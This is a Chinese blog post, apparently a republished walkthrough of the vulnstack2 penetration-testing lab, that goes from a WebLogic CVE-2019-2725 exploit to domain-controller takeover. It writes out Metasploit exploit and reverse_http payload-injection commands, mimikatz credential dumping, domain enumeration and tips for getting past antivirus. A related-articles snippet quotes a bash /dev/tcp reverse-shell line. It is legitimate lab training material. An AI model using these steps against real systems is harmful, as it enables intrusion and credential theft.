红日内网渗透靶场vulnstack2

2023-12-23 08:59

本文主要是介绍红日内网渗透靶场vulnstack2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言:

内网真是个全新的领域,需要学习的地方甚广。

环境搭建:

简单贴几张图,先编辑 两个网络, 一个内网,一个外网

一个VM1 一个VM8   vm1仅主机, vm8NAT模式, 子网地址如图, 注意dhcp也要更改,不然会出现ping 不通的情况:

 我的环境如下:

kali :192.168.111.128
DC :10.10.10.10
PC:10.10.10.201(内网,VM1) , 192.168.111.3(外网,VM8)
WEB :10.10.10.80(内网,WM1),192.168.111.80(外网,VM8)

简单测试一下 能否互相ping 通,这里要注意的是,如果kali 不能ping通 PC,则要关闭一下防火墙。

再注意一下,都需要ping通,所以 关掉防火墙!!!

然后在web 服务器开启一下web 服务,以管理员身份运行 

 这样就算配置好了

好了进入正题:

Web 渗透

我们访问这个web 服务什么都没有32

我们用 nmap 扫一下端口。

 

得到以上存活端口, 对较此文 得知:

445端口开放意味着存在smb服务,可能存在ms17_010永恒之蓝漏洞。139端口开放即存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞。1433端口开放就存在mssql服务,可能存在爆破/注入/SA弱口令。3389端口开放存在远程桌面。7001端口开放就存在weblogic。

因为 445 端口利用有点麻烦,还要弹msf , 还有其他端口利用也比较麻烦,3389端口需要先提权,所以我们这里先利用7001端口,即weblogic 的漏洞。因为这里是有工具可以扫描的,所以利用起来会比较方便。

下载教程:WeblogicScan安装及使用_Andrewlong_lhl的博客-CSDN博客_weblogicscan安装

 扫一下,执行命令:

1.python WeblogicScan.py 192.168.235.80 70012.python WeblogicScan.py -u 192.168.111.80 -p 7001

这里扫出了两个 CVE ,2017-3506  和  2019-2725   存在SSRF。

简单来说SSRF就是一个服务器端请求伪造,由攻击者构造形成由服务器端发起的安全漏洞。

漏洞利用

因为我们已经知道 有两个CVE 了,这里主要介绍一下两种攻击思路,一个是smf 反弹shell 提权,另一个是cs提权。

但是这个 web服务器的机子装了360,还是有点难搞的,但是我们也应该按照正常思路去走一下,看看是什么效果。

msfconsole
search CVE-2019-2725//进入msf 查找一下Cve-2019-2725的漏洞利用脚本

看到确实是有利用的脚本的 

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice //使用此模块
show options            查看一些需要设置的参数
set rhosts 192.168.111.80   设置对端ip
set lhost 192.168.235.128    设置对端端口
set target 1                 设置被攻击的主机系统,0 = unix  1 =windows
run 

修改完直接run:

 成功打进去了,简单搜集下

 可以看到 内网存在三台主机

 域收集,成功getshll 了。

尝试提权:

getuid
getsystem
getuid

 提权失败。


MSF派生CS

kali开个cs 服务端

 windows 开个客户端:

密码就刚才设置的1234,开个监听

 ADD:

我background后的session是1 注意下你的

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.235.129
set lport 8888
set session 2
run

 

 回到cs,主机上线

 进行提权:

 

 成功提权admin。

信息收集

ipconfig /all   # 查看本机ip,所在域

net user /domain    #查询域内用户

 

不懂为什么拒绝访问。

net group "domain computers" /domain  # 查看域中的其他主机名

 ping 一下 DC 和 PC

run mimikaz

 得到密码

目标主机所在的网络存在域环境,域名为de1ay.com,存在两台域主机WEB和PC,域控制器为DC.de1ay.com,主机名为DC,域管理员为Administrator。  PC的IP地址为10.10.10.201  DC的IP地址为 :10.10.10.10


横向移动

因为前面扫到445 端口是开启的,考虑域横向移动

 这里有我们搜集到的信息:

 下方新建smb

payload 选smb 

对DC进行横向移动

 

 

 拿下DC 

另外俩种绕杀软的方法。

前面讲从web渗透到内网渗透中间遇到了360杀毒软件,把我们msf要弹的shell给拦截了,把CS执行的钓鱼链接也给拦截了,但其实我们一开始扫IP端口的时候发现3389是打开的,我们其实可以利用3389远程登录web机器把它的杀软关了,最后再进行操作。

通过rdesktop指令远程登录到Windows进行修改,我们可以直接关闭杀软,就没有这么多屁事要做了。

 

总结:

emmm 很多东西还是不会 也参考了很多文章才勉强拿下DC,还需加油

 

这篇关于红日内网渗透靶场vulnstack2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/527465

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

【渗透测试专栏】1.2认证和授权类-越权访问(水平/垂直越权)

该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 靶机环境请看专栏前言专栏前言-WooYun漏洞库环境搭建-CSDN博客 目录 该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 一、漏洞描述 1、水平越权 2、垂直越权 二、漏洞级别 三、漏洞检测方法 漏洞修复 一、漏洞描述 偏业务漏洞 1、水平越权 水平越权指的是在同一权限级别下,用户可以访问其他用户的资源或

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

渗透中的文件上传与下载

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。 目录 利用powershell进行文件上传下载 利用bitsadmin命令进行文件下载 利用certutil命令上传下载文件 利用wget命令上传下载文件 利用powershell进行文件上传下载 # 下载脚本并在内存中执行pow

【网络安全 | 渗透工具】Cencys+Shodan使用教程

原创文章,不得转载。 文章目录 Cencys准备语法全文搜索字段和值搜索通配符搜索布尔逻辑搜索嵌套搜索时间相关搜索范围搜索双引号 (")转义序列和保留字符 Censys 搜索语言中的主机查询查看主机搜索结果Censys 搜索语言中的证书查询查看证书搜索结果生成报告其余 Shodan准备使用语法查看设备详情 Cencys Censys 是一个强大的互联网搜索引擎和数据平台